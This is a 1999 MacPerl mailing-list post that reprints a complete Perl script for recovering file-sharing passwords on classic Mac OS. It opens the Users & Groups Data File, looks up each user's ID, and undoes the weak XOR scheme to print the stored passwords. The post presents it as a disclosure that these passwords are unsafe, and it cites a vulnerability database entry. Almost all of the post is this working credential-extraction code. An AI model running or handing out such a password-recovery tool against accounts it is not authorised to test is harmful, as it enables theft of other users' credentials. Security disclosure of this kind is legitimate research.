[Date Prev][Date Next][Thread Prev][Thread Next] [Search] [Date Index] [Thread Index]

Re: [MacPerl] Are Your File Sharing Passwords Safe?



At 15.16 -0400 1999.07.14, Chris Nandor wrote:
>If you have Mac::Glue installed (and the Users and Groups OSAX), you can
>run this and find out (hint: the answer is "no").
>
>    http://pudge.net/files/macperl/scripts/decrypt_users_and_groups.plx

Since pudge.net could go down any moment now, here is the script.  It isn't
too long, most of the code there is just getting the user names and ID
numbers.

#!perl -w
# decrypt_users_and_groups.plx - decrypt Users & Groups passwords
# by Chris Nandor, pudge@pobox.com, http://pudge.net/
# Wednesday, July 14, 1999
#
# Requirements:
# MacPerl
#   <URL:http://www.macperl.com/>
#
# Users and Groups OSAX
#   <URL:http://hyperarchive.lcs.mit.edu/HyperArchive/Archive
#       /dev/osa/users-and-groups-osax-12b.hqx>
#
# Mac::Glue and cpan-mac
#   <URL:http://www.perl.com/CPAN/authors/id/CNANDOR/>

use Fcntl;
use Mac::Files;
use Mac::Glue ':all';
use POSIX 'isprint';
use strict;

my($f, %u, $u, $t, @k, $g);
$f = $ARGV[0] ||
    FindFolder(kOnSystemDisk, kPreferencesFolderType) .
    ':Users & Groups Data File';
$g = new Mac::Glue 'Finder';

while (1) {
    my $info = $g->get_next_user_info( $u ? (name => $u) : () );
    if (exists $info->{'ID  '}) {
        $u{$info->{pnam}} = $info->{'ID  '};
        $u = $info->{pnam};
    } else {
        last;
    }
}

@k = map ord, qw(s p c g t p r k);
sysopen F, $f, O_RDONLY or die $!;
read F, $t, -s $f;

for my $u (sort {$u{$a} <=> $u{$b}} keys %u) {
    MAIN: while ($t =~ /$u\000?(.{8})/gs) {
        my(@b, $p) = unpack 'C*', $1;
        next if $b[0] == 0;
        for my $i (0 .. $#b) {
            # i think i have the algorithm right, here,
            # it is different than the one encountered
            # on http://www.securityfocus.com/vdb/bottom.html?vid=519
            # first character seems to be XORd with user's ID XOR 1

            my $c = $b[$i] ^ ($i == 0 ? $u{$u} ^ 1 : $b[$i-1]) ^ $k[$i];
            next MAIN if $c != 0 && ! isprint(chr $c);
            $p .= chr $c;
        }
        $p =~ s/\000+$//;
        printf "possible password for '$u': $p\n";
    }
}

BEGIN {
    $Mac::AppleEvents::Simple::AE_GET{UREC} = sub {
        $Mac::AppleEvents::Simple::AE_GET{typeAERecord()}->
            (AECoerceDesc(shift, typeAERecord))
    }
}

__END__

--
Chris Nandor          mailto:pudge@pobox.com         http://pudge.net/
%PGPKey = ('B76E72AD', [1024, '0824090B CE73CA10  1FF77F13 8180B6B6'])


===== Want to unsubscribe from this list?
===== Send mail with body "unsubscribe" to macperl-request@macperl.org